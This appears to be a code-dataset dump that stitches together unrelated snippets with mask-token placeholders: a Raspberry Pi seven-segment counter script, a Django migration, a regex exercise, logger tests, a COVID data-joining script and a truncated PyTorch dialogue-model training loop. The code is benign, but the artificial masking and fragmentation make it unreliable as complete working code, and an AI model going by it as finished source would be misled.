contador)\n time.sleep(0.3)\n if GPIO.input(minus):\n if contador == 0:\n contador = 99\n else:\n contador = contador - 1\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n\n\ndef main():\n setupLed1()\n setupLed2()\n turnOffAllLeds()\n try:\n print('Presione un boton para continuar')\n digiTurno()\n except (KeyboardInterrupt, SystemExit):\n GPIO.cleanup()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef setupLed1():\n for port in led1:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef setupLed2():\n for port in led2:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef statusLed(port, status):\n GPIO.output(port, status)\n\n\ndef turnOnAllLeds():\n for led in led1:\n statusLed(led[1], True)\n for led in led2:\n statusLed(led[1], True)\n\n\ndef turnOffAllLeds():\n for led in led1:\n statusLed(led[1], False)\n for led in led2:\n statusLed(led[1], False)\n\n\ndef turnOffOneLed(led):\n for port in led:\n statusLed(port[1], False)\n\n\ndef createNumber(ledNumber, number):\n turnOffOneLed(ledNumber)\n for i in range(10):\n if number == i:\n for letter in numbers[i]:\n for led in ledNumber:\n if led[0] == letter:\n statusLed(led[1], True)\n\n\ndef createNumber2Leds(led1, led2, number):\n if number < 10:\n createNumber(led1, 0)\n createNumber(led2, number)\n else:\n decenas = number / 10\n unidades = number % 10\n createNumber(led1, decenas)\n createNumber(led2, unidades)\n\n\ndef titileoNumber2Leds(led1, led2, number):\n for i in range(3):\n turnOffAllLeds()\n time.sleep(0.25)\n createNumber2Leds(led1, led2, number)\n time.sleep(0.25)\n\n\ndef digiTurno():\n contador = 0\n titileoNumber2Leds(led1, led2, contador)\n while True:\n if GPIO.input(reset):\n contador = 0\n print('-' * 20 + ' RESET ' + '-' * 20)\n print(datetime.now())\n titileoNumber2Leds(led1, led2, contador)\n print('Numero actual = ' + str(contador))\n time.sleep(0.3)\n if GPIO.input(more):\n if contador < 99:\n contador += 1\n else:\n print(datetime.now())\n contador = 0\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n if GPIO.input(minus):\n if contador == 0:\n contador = 99\n else:\n contador = contador - 1\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n\n\ndef main():\n setupLed1()\n setupLed2()\n turnOffAllLeds()\n try:\n print('Presione un boton para continuar')\n 
digiTurno()\n except (KeyboardInterrupt, SystemExit):\n GPIO.cleanup()\n\n\n<mask token>\n",
"step-3": "<mask token>\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\nGPIO.setup(reset, GPIO.IN)\nGPIO.setup(minus, GPIO.IN)\nGPIO.setup(more, GPIO.IN)\n\n\ndef setupLed1():\n for port in led1:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef setupLed2():\n for port in led2:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef statusLed(port, status):\n GPIO.output(port, status)\n\n\ndef turnOnAllLeds():\n for led in led1:\n statusLed(led[1], True)\n for led in led2:\n statusLed(led[1], True)\n\n\ndef turnOffAllLeds():\n for led in led1:\n statusLed(led[1], False)\n for led in led2:\n statusLed(led[1], False)\n\n\ndef turnOffOneLed(led):\n for port in led:\n statusLed(port[1], False)\n\n\ndef createNumber(ledNumber, number):\n turnOffOneLed(ledNumber)\n for i in range(10):\n if number == i:\n for letter in numbers[i]:\n for led in ledNumber:\n if led[0] == letter:\n statusLed(led[1], True)\n\n\ndef createNumber2Leds(led1, led2, number):\n if number < 10:\n createNumber(led1, 0)\n createNumber(led2, number)\n else:\n decenas = number / 10\n unidades = number % 10\n createNumber(led1, decenas)\n createNumber(led2, unidades)\n\n\ndef titileoNumber2Leds(led1, led2, number):\n for i in range(3):\n turnOffAllLeds()\n time.sleep(0.25)\n createNumber2Leds(led1, led2, number)\n time.sleep(0.25)\n\n\ndef digiTurno():\n contador = 0\n titileoNumber2Leds(led1, led2, contador)\n while True:\n if GPIO.input(reset):\n contador = 0\n print('-' * 20 + ' RESET ' + '-' * 20)\n print(datetime.now())\n titileoNumber2Leds(led1, led2, contador)\n print('Numero actual = ' + str(contador))\n time.sleep(0.3)\n if GPIO.input(more):\n if contador < 99:\n contador += 1\n else:\n print(datetime.now())\n contador = 0\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n if GPIO.input(minus):\n if contador == 0:\n contador = 99\n else:\n contador = contador - 1\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n 
time.sleep(0.3)\n\n\ndef main():\n setupLed1()\n setupLed2()\n turnOffAllLeds()\n try:\n print('Presione un boton para continuar')\n digiTurno()\n except (KeyboardInterrupt, SystemExit):\n GPIO.cleanup()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nled1 = [('g', 40), ('f', 38), ('a', 36), ('b', 32), ('e', 26), ('d', 24), (\n 'c', 22)]\nled2 = [('g', 19), ('f', 15), ('a', 13), ('b', 11), ('e', 7), ('d', 5), (\n 'c', 3)]\nnumbers = [('a', 'b', 'c', 'd', 'e', 'f'), ('b', 'c'), ('a', 'b', 'g', 'e',\n 'd'), ('a', 'b', 'g', 'c', 'd'), ('f', 'g', 'b', 'c'), ('a', 'f', 'g',\n 'c', 'd'), ('a', 'f', 'g', 'c', 'd', 'e'), ('a', 'b', 'c'), ('a', 'b',\n 'c', 'd', 'e', 'f', 'g'), ('a', 'b', 'c', 'd', 'f', 'g')]\nreset = 12\nminus = 16\nmore = 18\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\nGPIO.setup(reset, GPIO.IN)\nGPIO.setup(minus, GPIO.IN)\nGPIO.setup(more, GPIO.IN)\n\n\ndef setupLed1():\n for port in led1:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef setupLed2():\n for port in led2:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef statusLed(port, status):\n GPIO.output(port, status)\n\n\ndef turnOnAllLeds():\n for led in led1:\n statusLed(led[1], True)\n for led in led2:\n statusLed(led[1], True)\n\n\ndef turnOffAllLeds():\n for led in led1:\n statusLed(led[1], False)\n for led in led2:\n statusLed(led[1], False)\n\n\ndef turnOffOneLed(led):\n for port in led:\n statusLed(port[1], False)\n\n\ndef createNumber(ledNumber, number):\n turnOffOneLed(ledNumber)\n for i in range(10):\n if number == i:\n for letter in numbers[i]:\n for led in ledNumber:\n if led[0] == letter:\n statusLed(led[1], True)\n\n\ndef createNumber2Leds(led1, led2, number):\n if number < 10:\n createNumber(led1, 0)\n createNumber(led2, number)\n else:\n decenas = number / 10\n unidades = number % 10\n createNumber(led1, decenas)\n createNumber(led2, unidades)\n\n\ndef titileoNumber2Leds(led1, led2, number):\n for i in range(3):\n turnOffAllLeds()\n time.sleep(0.25)\n createNumber2Leds(led1, led2, number)\n time.sleep(0.25)\n\n\ndef digiTurno():\n contador = 0\n titileoNumber2Leds(led1, led2, contador)\n while True:\n if GPIO.input(reset):\n contador = 0\n print('-' * 20 + ' RESET ' + '-' * 20)\n print(datetime.now())\n 
titileoNumber2Leds(led1, led2, contador)\n print('Numero actual = ' + str(contador))\n time.sleep(0.3)\n if GPIO.input(more):\n if contador < 99:\n contador += 1\n else:\n print(datetime.now())\n contador = 0\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n if GPIO.input(minus):\n if contador == 0:\n contador = 99\n else:\n contador = contador - 1\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n\n\ndef main():\n setupLed1()\n setupLed2()\n turnOffAllLeds()\n try:\n print('Presione un boton para continuar')\n digiTurno()\n except (KeyboardInterrupt, SystemExit):\n GPIO.cleanup()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import RPi.GPIO as GPIO\nimport time\nfrom datetime import datetime\n\nled1 = [('g', 40), ('f', 38), ('a', 36), ('b', 32),\n ('e', 26), ('d', 24), ('c', 22)]\nled2 = [('g', 19), ('f', 15), ('a', 13),\n ('b', 11), ('e', 7), ('d', 5), ('c', 3)]\nnumbers = [\n ('a', 'b', 'c', 'd', 'e', 'f'),\n ('b', 'c'),\n ('a', 'b', 'g', 'e', 'd'),\n ('a', 'b', 'g', 'c', 'd'),\n ('f', 'g', 'b', 'c'),\n ('a', 'f', 'g', 'c', 'd'),\n ('a', 'f', 'g', 'c', 'd', 'e'),\n ('a', 'b', 'c'),\n ('a', 'b', 'c', 'd', 'e', 'f', 'g'),\n ('a', 'b', 'c', 'd', 'f', 'g')\n]\n\nreset = 12\nminus = 16\nmore = 18\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\nGPIO.setup(reset, GPIO.IN)\nGPIO.setup(minus, GPIO.IN)\nGPIO.setup(more, GPIO.IN)\n\n\ndef setupLed1():\n for port in led1:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef setupLed2():\n for port in led2:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef statusLed(port, status):\n GPIO.output(port, status)\n\n\ndef turnOnAllLeds():\n for led in led1:\n statusLed(led[1], True)\n for led in led2:\n statusLed(led[1], True)\n\n\ndef turnOffAllLeds():\n for led in led1:\n statusLed(led[1], False)\n for led in led2:\n statusLed(led[1], False)\n\n\ndef turnOffOneLed(led):\n for port in led:\n statusLed(port[1], False)\n\n\ndef createNumber(ledNumber, number):\n turnOffOneLed(ledNumber)\n for i in range(10):\n if number == i:\n for letter in numbers[i]:\n for led in ledNumber:\n if led[0] == letter:\n statusLed(led[1], True)\n\n\ndef createNumber2Leds(led1, led2, number):\n if number < 10:\n createNumber(led1, 0)\n createNumber(led2, number)\n else:\n decenas = number / 10\n unidades = number % 10\n createNumber(led1, decenas)\n createNumber(led2, unidades)\n\n\ndef titileoNumber2Leds(led1, led2, number):\n for i in range(3):\n turnOffAllLeds()\n time.sleep(0.25)\n createNumber2Leds(led1, led2, number)\n time.sleep(0.25)\n\n\ndef digiTurno():\n contador = 0\n titileoNumber2Leds(led1, led2, contador)\n while True:\n if GPIO.input(reset):\n contador = 0\n 
print(\"-\"*20+\" RESET \"+\"-\"*20)\n print(datetime.now())\n titileoNumber2Leds(led1, led2, contador)\n print(\"Numero actual = \"+str(contador))\n time.sleep(.3)\n if GPIO.input(more):\n if contador < 99:\n contador += 1\n else:\n print(datetime.now())\n contador = 0\n print(\"Numero actual = \"+str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(.3)\n if GPIO.input(minus):\n if contador == 0:\n contador = 99\n else:\n contador = contador-1\n print(\"Numero actual = \"+str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(.3)\n\n\ndef main():\n setupLed1()\n setupLed2()\n turnOffAllLeds()\n try:\n print(\"Presione un boton para continuar\")\n digiTurno()\n except (KeyboardInterrupt, SystemExit):\n GPIO.cleanup()\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
10,
11,
12,
13,
15
]
}
|
[
10,
11,
12,
13,
15
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('challenges', '0019_auto_20170310_1114')]
operations = [migrations.AddField(model_name='challenge', name=
'supported_languages', field=models.ManyToManyField(to=
'challenges.Language'))]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('challenges', '0019_auto_20170310_1114')]
operations = [migrations.AddField(model_name='challenge', name=
'supported_languages', field=models.ManyToManyField(to=
'challenges.Language'))]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-15 15:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('challenges', '0019_auto_20170310_1114'),
]
operations = [
migrations.AddField(
model_name='challenge',
name='supported_languages',
field=models.ManyToManyField(to='challenges.Language'),
),
]
|
flexible
|
{
"blob_id": "6b7ff00eb9a5d0837def5b245ba2d4a0acec972e",
"index": 3466,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('challenges', '0019_auto_20170310_1114')]\n operations = [migrations.AddField(model_name='challenge', name=\n 'supported_languages', field=models.ManyToManyField(to=\n 'challenges.Language'))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('challenges', '0019_auto_20170310_1114')]\n operations = [migrations.AddField(model_name='challenge', name=\n 'supported_languages', field=models.ManyToManyField(to=\n 'challenges.Language'))]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.5 on 2017-03-15 15:20\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('challenges', '0019_auto_20170310_1114'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='challenge',\n name='supported_languages',\n field=models.ManyToManyField(to='challenges.Language'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(str(bool(re.search(regex, raw_input()))).lower())
<|reserved_special_token_1|>
<|reserved_special_token_0|>
regex = '^\\d{2}(-?)\\d{2}\\1\\d{2}\\1\\d{2}$'
<|reserved_special_token_0|>
print(str(bool(re.search(regex, raw_input()))).lower())
<|reserved_special_token_1|>
<|reserved_special_token_0|>
regex = '^\\d{2}(-?)\\d{2}\\1\\d{2}\\1\\d{2}$'
import re
print(str(bool(re.search(regex, raw_input()))).lower())
<|reserved_special_token_1|>
'''
Created on 13 Dec 2016
@author: hpcosta
'''
# https://www.hackerrank.com/challenges/backreferences-to-failed-groups
regex = r"^\d{2}(-?)\d{2}\1\d{2}\1\d{2}$" # Do not delete 'r'.
import re
print(str(bool(re.search(regex, raw_input()))).lower())
# Task
#
# You have a test string S.
# Your task is to write a regex which will match S, with following condition(s):
#
# S consists of 8 digits.
# S may have "-" separator such that string S gets divided in 4 parts, with each part having exactly two digits. (Eg. 12-34-56-78)
# Valid
#
# 12345678
# 12-34-56-87
# Invalid
#
# 1-234-56-78
# 12-45-7810
|
flexible
|
{
"blob_id": "e884ce5878de75afe93085e2310b4b8d5953963a",
"index": 337,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(str(bool(re.search(regex, raw_input()))).lower())\n",
"step-3": "<mask token>\nregex = '^\\\\d{2}(-?)\\\\d{2}\\\\1\\\\d{2}\\\\1\\\\d{2}$'\n<mask token>\nprint(str(bool(re.search(regex, raw_input()))).lower())\n",
"step-4": "<mask token>\nregex = '^\\\\d{2}(-?)\\\\d{2}\\\\1\\\\d{2}\\\\1\\\\d{2}$'\nimport re\nprint(str(bool(re.search(regex, raw_input()))).lower())\n",
"step-5": "'''\nCreated on 13 Dec 2016\n\n@author: hpcosta\n'''\n# https://www.hackerrank.com/challenges/backreferences-to-failed-groups\n\nregex = r\"^\\d{2}(-?)\\d{2}\\1\\d{2}\\1\\d{2}$\" # Do not delete 'r'.\n\nimport re\n\nprint(str(bool(re.search(regex, raw_input()))).lower())\n\n\n\n# Task\n# \n# You have a test string S. \n# Your task is to write a regex which will match S, with following condition(s):\n# \n# S consists of 8 digits.\n# S may have \"-\" separator such that string S gets divided in 4 parts, with each part having exactly two digits. (Eg. 12-34-56-78)\n# Valid \n# \n# 12345678\n# 12-34-56-87\n# Invalid \n# \n# 1-234-56-78\n# 12-45-7810",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LoggerTestCase(TestCase):
def test_flag_value(self):
self.assertEqual(SUCCESS, '\x1b[34mSUCCESS\x1b[0m')
self.assertEqual(FAILURE, '\x1b[31mFAILURE\x1b[0m')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LoggerTestCase(TestCase):
def test_flag_value(self):
self.assertEqual(SUCCESS, '\x1b[34mSUCCESS\x1b[0m')
self.assertEqual(FAILURE, '\x1b[31mFAILURE\x1b[0m')
def test_logger(self):
msg = 'test'
self.assertEqual(logger.info(msg), '\x1b[97m[~] \x1b[0mtest')
self.assertEqual(logger.info(msg, SUCCESS),
'\x1b[97m[~] \x1b[0m\x1b[34mSUCCESS\x1b[0m test')
self.assertEqual(logger.warn(msg), '\x1b[33m[!] \x1b[0mtest')
self.assertEqual(logger.error(msg), '\x1b[31m[-] \x1b[0mtest')
self.assertEqual(logger.error(msg, FAILURE),
'\x1b[31m[-] \x1b[0m\x1b[31mFAILURE\x1b[0m test')
<|reserved_special_token_1|>
from unittest import TestCase
from optimoida.logging import SUCCESS, FAILURE, logger
class LoggerTestCase(TestCase):
def test_flag_value(self):
self.assertEqual(SUCCESS, '\x1b[34mSUCCESS\x1b[0m')
self.assertEqual(FAILURE, '\x1b[31mFAILURE\x1b[0m')
def test_logger(self):
msg = 'test'
self.assertEqual(logger.info(msg), '\x1b[97m[~] \x1b[0mtest')
self.assertEqual(logger.info(msg, SUCCESS),
'\x1b[97m[~] \x1b[0m\x1b[34mSUCCESS\x1b[0m test')
self.assertEqual(logger.warn(msg), '\x1b[33m[!] \x1b[0mtest')
self.assertEqual(logger.error(msg), '\x1b[31m[-] \x1b[0mtest')
self.assertEqual(logger.error(msg, FAILURE),
'\x1b[31m[-] \x1b[0m\x1b[31mFAILURE\x1b[0m test')
<|reserved_special_token_1|>
#!/usr/bin/env python
# coding: utf-8
from unittest import TestCase
from optimoida.logging import (
SUCCESS, FAILURE, logger)
class LoggerTestCase(TestCase):
def test_flag_value(self):
self.assertEqual(SUCCESS, "\x1b[34mSUCCESS\x1b[0m")
self.assertEqual(FAILURE, "\x1b[31mFAILURE\x1b[0m")
def test_logger(self):
msg = "test"
self.assertEqual(logger.info(msg), "\x1b[97m[~] \x1b[0mtest")
self.assertEqual(
logger.info(msg, SUCCESS),
"\x1b[97m[~] \x1b[0m\x1b[34mSUCCESS\x1b[0m test")
self.assertEqual(logger.warn(msg), "\x1b[33m[!] \x1b[0mtest")
self.assertEqual(logger.error(msg), "\x1b[31m[-] \x1b[0mtest")
self.assertEqual(
logger.error(msg, FAILURE),
"\x1b[31m[-] \x1b[0m\x1b[31mFAILURE\x1b[0m test")
|
flexible
|
{
"blob_id": "ac8c8dc4bcccef7942dd48d54902e13e811f950c",
"index": 5059,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass LoggerTestCase(TestCase):\n\n def test_flag_value(self):\n self.assertEqual(SUCCESS, '\\x1b[34mSUCCESS\\x1b[0m')\n self.assertEqual(FAILURE, '\\x1b[31mFAILURE\\x1b[0m')\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass LoggerTestCase(TestCase):\n\n def test_flag_value(self):\n self.assertEqual(SUCCESS, '\\x1b[34mSUCCESS\\x1b[0m')\n self.assertEqual(FAILURE, '\\x1b[31mFAILURE\\x1b[0m')\n\n def test_logger(self):\n msg = 'test'\n self.assertEqual(logger.info(msg), '\\x1b[97m[~] \\x1b[0mtest')\n self.assertEqual(logger.info(msg, SUCCESS),\n '\\x1b[97m[~] \\x1b[0m\\x1b[34mSUCCESS\\x1b[0m test')\n self.assertEqual(logger.warn(msg), '\\x1b[33m[!] \\x1b[0mtest')\n self.assertEqual(logger.error(msg), '\\x1b[31m[-] \\x1b[0mtest')\n self.assertEqual(logger.error(msg, FAILURE),\n '\\x1b[31m[-] \\x1b[0m\\x1b[31mFAILURE\\x1b[0m test')\n",
"step-4": "from unittest import TestCase\nfrom optimoida.logging import SUCCESS, FAILURE, logger\n\n\nclass LoggerTestCase(TestCase):\n\n def test_flag_value(self):\n self.assertEqual(SUCCESS, '\\x1b[34mSUCCESS\\x1b[0m')\n self.assertEqual(FAILURE, '\\x1b[31mFAILURE\\x1b[0m')\n\n def test_logger(self):\n msg = 'test'\n self.assertEqual(logger.info(msg), '\\x1b[97m[~] \\x1b[0mtest')\n self.assertEqual(logger.info(msg, SUCCESS),\n '\\x1b[97m[~] \\x1b[0m\\x1b[34mSUCCESS\\x1b[0m test')\n self.assertEqual(logger.warn(msg), '\\x1b[33m[!] \\x1b[0mtest')\n self.assertEqual(logger.error(msg), '\\x1b[31m[-] \\x1b[0mtest')\n self.assertEqual(logger.error(msg, FAILURE),\n '\\x1b[31m[-] \\x1b[0m\\x1b[31mFAILURE\\x1b[0m test')\n",
"step-5": "#!/usr/bin/env python\n# coding: utf-8\n\nfrom unittest import TestCase\nfrom optimoida.logging import (\n SUCCESS, FAILURE, logger)\n\n\nclass LoggerTestCase(TestCase):\n\n def test_flag_value(self):\n\n self.assertEqual(SUCCESS, \"\\x1b[34mSUCCESS\\x1b[0m\")\n self.assertEqual(FAILURE, \"\\x1b[31mFAILURE\\x1b[0m\")\n\n def test_logger(self):\n\n msg = \"test\"\n\n self.assertEqual(logger.info(msg), \"\\x1b[97m[~] \\x1b[0mtest\")\n self.assertEqual(\n logger.info(msg, SUCCESS),\n \"\\x1b[97m[~] \\x1b[0m\\x1b[34mSUCCESS\\x1b[0m test\")\n\n self.assertEqual(logger.warn(msg), \"\\x1b[33m[!] \\x1b[0mtest\")\n\n self.assertEqual(logger.error(msg), \"\\x1b[31m[-] \\x1b[0mtest\")\n self.assertEqual(\n logger.error(msg, FAILURE),\n \"\\x1b[31m[-] \\x1b[0m\\x1b[31mFAILURE\\x1b[0m test\")\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def extremes(nums):
return max(nums), min(nums)
<|reserved_special_token_1|>
# *Using Min & Max Exercise
def extremes(nums):
return (max(nums), min(nums))
|
flexible
|
{
"blob_id": "0577c274672bac333500535f21f568ade62100c7",
"index": 3580,
"step-1": "<mask token>\n",
"step-2": "def extremes(nums):\n return max(nums), min(nums)\n",
"step-3": "\n# *Using Min & Max Exercise\ndef extremes(nums):\n return (max(nums), min(nums))\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import pandas as pd
import notification
def modify(nyt_url, jh_url):
    """Build a joined daily US COVID dataframe from NYT and Johns Hopkins CSVs.

    Parameters
    ----------
    nyt_url : str
        CSV whose first three columns are date / cases / deaths
        (NYT national time series).
    jh_url : str
        CSV containing at least Date, Country/Region and Recovered columns
        (Johns Hopkins daily data).

    Returns
    -------
    pandas.DataFrame or None
        Columns Date (YYYY-MM-DD string), Cases, Deaths, Country, Recovered
        for US rows only; None when any step fails, after sending an SNS
        alert via the notification module.
    """
    # --- NYT: national cases/deaths per day ---
    try:
        nyt_df = pd.read_csv(nyt_url,
                             header=0,
                             names=['Date', 'Cases', 'Deaths'],
                             dtype={'Cases': 'Int64', 'Deaths': 'Int64'})
        nyt_df['Date'] = pd.to_datetime(nyt_df['Date'], format="%Y-%m-%d")
    except Exception:
        # `except Exception` instead of a bare except so KeyboardInterrupt /
        # SystemExit still propagate.
        alert = "Error with NYT link"
        notification.send_sns(alert)
        print(alert)
        # Without NYT data the join below would raise a NameError and emit a
        # misleading "Error joining data" alert, so stop here.
        return None

    # --- Johns Hopkins: per-country recoveries per day ---
    try:
        jh_df = pd.read_csv(jh_url,
                            usecols=['Date', 'Country/Region', 'Recovered'],
                            dtype={'Recovered': 'Int64'},
                            encoding='utf8').dropna()
        jh_df.rename(columns={'Country/Region': 'Country'}, inplace=True)
        jh_df['Date'] = pd.to_datetime(jh_df['Date'], format="%Y-%m-%d")
    except Exception:
        alert = "Error with JH link"
        notification.send_sns(alert)
        print(alert)
        return None

    # --- join the two sources on Date, keeping US rows only ---
    try:
        jh_us_filter = jh_df[jh_df.Country == 'US']
        covid_df = nyt_df.set_index('Date').join(
            jh_us_filter.set_index('Date')).dropna()
        covid_df.reset_index(inplace=True)
        covid_df['Date'] = covid_df['Date'].dt.strftime('%Y-%m-%d')
        return covid_df
    except Exception:
        alert = "Error joining data"
        notification.send_sns(alert)
        print(alert)
        return None
|
normal
|
{
"blob_id": "c60971b3b0649fce8c435813de4a738f4eacda27",
"index": 4377,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef modify(nyt_url, jh_url):\n try:\n nyt_df = pd.read_csv(nyt_url, header=0, names=['Date', 'Cases',\n 'Deaths'], dtype={'Cases': 'Int64', 'Deaths': 'Int64'})\n nyt_df['Date'] = pd.to_datetime(nyt_df['Date'], format='%Y-%m-%d')\n except:\n alert = 'Error with NYT link'\n notification.send_sns(alert)\n print(alert)\n try:\n jh_df = pd.read_csv(jh_url, usecols=['Date', 'Country/Region',\n 'Recovered'], dtype={'Recovered': 'Int64'}, encoding='utf8'\n ).dropna()\n jh_df.rename(columns={'Country/Region': 'Country'}, inplace=True)\n jh_df['Date'] = pd.to_datetime(jh_df['Date'], format='%Y-%m-%d')\n except:\n alert = 'Error with JH link'\n notification.send_sns(alert)\n print(alert)\n try:\n jh_us_filter = jh_df[jh_df.Country == 'US']\n covid_df = nyt_df.set_index('Date').join(jh_us_filter.set_index('Date')\n ).dropna()\n covid_df.reset_index(inplace=True)\n covid_df['Date'] = covid_df['Date'].dt.strftime('%Y-%m-%d')\n return covid_df\n except:\n alert = 'Error joining data'\n notification.send_sns(alert)\n print(alert)\n",
"step-3": "import pandas as pd\nimport notification\n\n\ndef modify(nyt_url, jh_url):\n try:\n nyt_df = pd.read_csv(nyt_url, header=0, names=['Date', 'Cases',\n 'Deaths'], dtype={'Cases': 'Int64', 'Deaths': 'Int64'})\n nyt_df['Date'] = pd.to_datetime(nyt_df['Date'], format='%Y-%m-%d')\n except:\n alert = 'Error with NYT link'\n notification.send_sns(alert)\n print(alert)\n try:\n jh_df = pd.read_csv(jh_url, usecols=['Date', 'Country/Region',\n 'Recovered'], dtype={'Recovered': 'Int64'}, encoding='utf8'\n ).dropna()\n jh_df.rename(columns={'Country/Region': 'Country'}, inplace=True)\n jh_df['Date'] = pd.to_datetime(jh_df['Date'], format='%Y-%m-%d')\n except:\n alert = 'Error with JH link'\n notification.send_sns(alert)\n print(alert)\n try:\n jh_us_filter = jh_df[jh_df.Country == 'US']\n covid_df = nyt_df.set_index('Date').join(jh_us_filter.set_index('Date')\n ).dropna()\n covid_df.reset_index(inplace=True)\n covid_df['Date'] = covid_df['Date'].dt.strftime('%Y-%m-%d')\n return covid_df\n except:\n alert = 'Error joining data'\n notification.send_sns(alert)\n print(alert)\n",
"step-4": "import pandas as pd\nimport notification\n\n\ndef modify(nyt_url, jh_url):\n # read data from both sources into a dataframe\n # remove unwanted data, formats, and filters\n # join dataframes on index\n try:\n nyt_df = pd.read_csv(nyt_url,\n header=0,\n names=['Date', 'Cases', 'Deaths'],\n dtype={'Cases': 'Int64', 'Deaths': 'Int64'})\n nyt_df['Date'] = pd.to_datetime(nyt_df['Date'], format=\"%Y-%m-%d\")\n except:\n alert = \"Error with NYT link\"\n notification.send_sns(alert)\n print(alert)\n\n try:\n jh_df = pd.read_csv(jh_url,\n usecols=['Date', 'Country/Region', 'Recovered'],\n dtype={'Recovered': 'Int64'},\n encoding='utf8').dropna()\n jh_df.rename(columns={'Country/Region': 'Country'}, inplace=True)\n jh_df['Date'] = pd.to_datetime(jh_df['Date'], format=\"%Y-%m-%d\")\n except:\n alert = \"Error with JH link\"\n notification.send_sns(alert)\n print(alert)\n\n try:\n jh_us_filter = jh_df[jh_df.Country == 'US']\n covid_df = nyt_df.set_index('Date').join(\n jh_us_filter.set_index('Date')).dropna()\n covid_df.reset_index(inplace=True)\n covid_df['Date'] = covid_df['Date'].dt.strftime('%Y-%m-%d')\n return covid_df\n except:\n alert = \"Error joining data\"\n notification.send_sns(alert)\n print(alert)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import os
import math
import time
from tqdm import tqdm
import torch
from torch import nn
import torch.optim as optim
from torch.nn import functional as F
from torch.nn.utils import clip_grad_norm_
from torch.utils.data import DataLoader
from nag.modules import Transformer, TransformerTorch
from nag.logger import LogManager, SummaryHelper
from nag.metric import BLEUMetric, DistinctNGram
from nag.vocab_helper import VocabBulider
from nag.utils import PadCollate, get_index, restore_best_state, init_seed
from nag.dataset import OpenSubDataset, IMSDBDataset
from nag.optimizer import RAdam
from nag.options import parse_args
from nag.criterion import similarity_regularization, LabelSmoothedCrossEntropyLoss
def train(epoch, model, dataloader, criterion, optimizer, scheduler):
    """Run one training epoch with gradient accumulation.

    Losses are divided by ACCUMULATION and gradients applied every
    ACCUMULATION micro-batches; running loss/BLEU/distinct-n averages are
    logged every opt.logstep steps.  Relies on module-level globals
    (opt, writer, mylogger, metric objects, vocab_bulider, datasets).
    """
    global global_train_step
    model.train()
    total_loss = 0.
    bleu_score = 0.
    distinct_1_score, distinct_2_score = 0., 0.
    for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0), desc='train', total=len(opensub_dataset)//opt.realbatch):
        # teacher forcing: feed tgt[:-1], predict tgt[1:]
        tgt_input = tgt[:, :-1]
        tgt_gold = tgt[:, 1:]
        tgt_lens = tgt_lens - 1
        decoder_output_probs, _ = model(
            src=src, tgt=tgt_input, src_lengths=src_lens, tgt_lengths=tgt_lens)
        # (batch, seq, vocab) -> (batch, vocab, seq) as the criterion expects
